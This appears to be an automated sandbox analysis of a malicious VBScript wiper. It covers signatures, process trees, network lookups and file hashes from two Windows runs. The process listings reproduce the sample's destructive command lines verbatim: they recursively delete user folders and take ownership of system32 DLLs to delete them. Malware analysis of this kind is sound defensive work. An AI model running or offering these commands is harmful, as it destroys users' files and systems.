Analysis Overview
SHA256
6d811ce895dd0383e794cef00804d44104196fb5bd263305fb3f10be77f24711
Threat Level: Likely malicious
The file file.vbs was found to be: Likely malicious.
Malicious Activity Summary
Possible privilege escalation attempt
Checks computer location settings
Modifies file permissions
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 21:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 21:06
Reported
2024-08-09 21:07
Platform
win7-20240704-en
Max time kernel
44s
Max time network
18s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k rd /s /q C:\Users\Admin\desktop >nul && rd /s /q C:\Users\Admin\downloads >nul && rd /s /q C:\Users\Admin\documents >nul && rd /s /q C:\Users\Admin\pictures >nul && rd /s /q C:\Users\Admin\music >nul && rd /s /q C:\Users\Admin\videos >nul && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\*.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\*.dll /grant Everyone:(F)
C:\Program Files\Windows Sidebar\sidebar.exe
"C:\Program Files\Windows Sidebar\sidebar.exe" /showGadgets
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe"
C:\Windows\system32\magnify.exe
"C:\Windows\system32\magnify.exe"
Network
Files
C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs
| MD5 | f552e24893f6d17cbf9ec48b8dc95bf6 |
| SHA1 | 141081a16db1c097d7d377f1cd3d2e3b0c85e18b |
| SHA256 | 98e5aa2e5b1d25eb95b305bd6ab2f0c7277a563791799bad5a00316acc68fd28 |
| SHA512 | 1008ead20f91fbd84e1a2dd665be008a3aa70b853b38599a308853ac8fd8e15b619e4d16ef4cef54f8c087b8c48a658c82c88d30171d6eb1991049ad8f259063 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-08-09 21:06
Reported
2024-08-09 21:07
Platform
win10v2004-20240802-en
Max time kernel
52s
Max time network
55s
Command Line
Signatures
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings | C:\Windows\System32\WScript.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k rd /s /q C:\Users\Admin\desktop >nul && rd /s /q C:\Users\Admin\downloads >nul && rd /s /q C:\Users\Admin\documents >nul && rd /s /q C:\Users\Admin\pictures >nul && rd /s /q C:\Users\Admin\music >nul && rd /s /q C:\Users\Admin\videos >nul && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\system32\*.dll >nul && icacls C:\Windows\system32\*.dll /grant Everyone:(F) >nul && del /s /q C:\Windows\system32\*.dll >nul 2>&1 && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\system32\*.dll
C:\Windows\system32\icacls.exe
icacls C:\Windows\system32\*.dll /grant Everyone:(F)
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4276,i,10065386245627775856,6567048529106473151,262144 --variations-seed-version --mojo-platform-channel-handle=1436 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | N/A | udp |
| N/A | 204.79.197.203:443 | N/A | tcp |
Files
C:\Users\Admin\AppData\Roaming\YOUR-COMPUTER-HAS-BEEN-DESTROYED_0+16file.vbs
| MD5 | f552e24893f6d17cbf9ec48b8dc95bf6 |
| SHA1 | 141081a16db1c097d7d377f1cd3d2e3b0c85e18b |
| SHA256 | 98e5aa2e5b1d25eb95b305bd6ab2f0c7277a563791799bad5a00316acc68fd28 |
| SHA512 | 1008ead20f91fbd84e1a2dd665be008a3aa70b853b38599a308853ac8fd8e15b619e4d16ef4cef54f8c087b8c48a658c82c88d30171d6eb1991049ad8f259063 |